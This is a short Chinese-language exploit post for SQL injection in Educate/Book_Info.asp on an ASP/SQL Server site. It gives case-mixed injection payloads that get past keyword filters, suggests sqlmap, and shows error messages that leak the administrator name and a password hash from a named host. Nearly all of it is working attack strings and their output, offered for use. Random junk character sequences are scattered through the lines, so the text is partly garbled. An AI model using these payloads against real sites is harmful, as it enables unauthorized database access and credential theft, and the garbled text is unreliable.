漏洞出现在Educate/Book_Info.asp, D! n( j6 G/ `9 ]
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出6 E5 m) o3 ?9 v! ?& P# E* a
exp:如下9 Q+ W8 i4 ^0 q2 s6 r
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)* n) c0 W6 X0 v% Z; ?2 t0 ^& O) v
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)+ q5 z" `8 i' [3 u# ]
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
1 l/ Y# S8 `; E% V3 c; BMicrosoft OLE DB Provider for SQL Server 错误 '80040e07' |! J5 c8 d# T; k6 ~( e2 M6 C
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。% a4 k: w: a q {& w$ q/ u
/Educate/Book_Info.asp,行 8
0 I5 e- H: y2 N/ Whttp://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
Q; G, ~1 f& L& B% S6 gMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
7 X- G/ X- }2 [% H6 r将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。. @8 v& b' x2 o6 `' T9 ?
/Educate/Book_Info.asp,行 8 |